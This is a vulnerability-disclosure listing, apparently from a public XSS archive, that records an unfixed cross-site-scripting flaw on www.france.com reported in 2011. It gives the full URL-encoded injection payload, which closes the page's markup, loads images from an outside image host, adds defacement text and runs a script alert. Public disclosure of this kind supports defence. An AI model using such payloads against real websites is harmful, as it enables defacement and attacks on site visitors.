Security researcher hitcher, has submitted on 05/07/2011 a cross-site-scripting (XSS) vulnerability affecting www.france.com, which at the time of submission ranked 381036 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/07/2011 |
Date published: 05/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: hitcher |
Domain: www.france.com |
Category: XSS |
Pagerank: 381036 |
URL: http://www.france.com/guide/districts.cfm?district_id='%22--%3E%3C/style%3E%3Cimg%20src=%22http://im g101.herosh.com/2011/05/04/332926795.jpg%22%20alt=%22Pulpit%20rock%22%20width=%221350%22%20height=%2 2190%22%20/%3E%3C/script%3E%3Ccenter%3E%3Cp%3E%3Ch1%20style=%22background-color:white%22%3EHithcer%2 0Is%20here%3C/h2%3E%3C/p%3E%3Cp%3E%3Ch1%20style=%22background-color:white%22%3EHijab%20Is%20The%20Ri ght%20Of%20Muslim%20Women%3C/h2%3E%3C/p%3E%3Cimg%20src=%22%20http://img105.herosh.com/2011/05/04/211 410399.jpg%20%22%20alt=%22Pulpit%20rock%22%20width=%221350%22%20height=%22500%22%20/%3E%3Cscript%3Ea lert(%22hello%22)%3C/script%3E |
Click here to view the mirror
|
|
|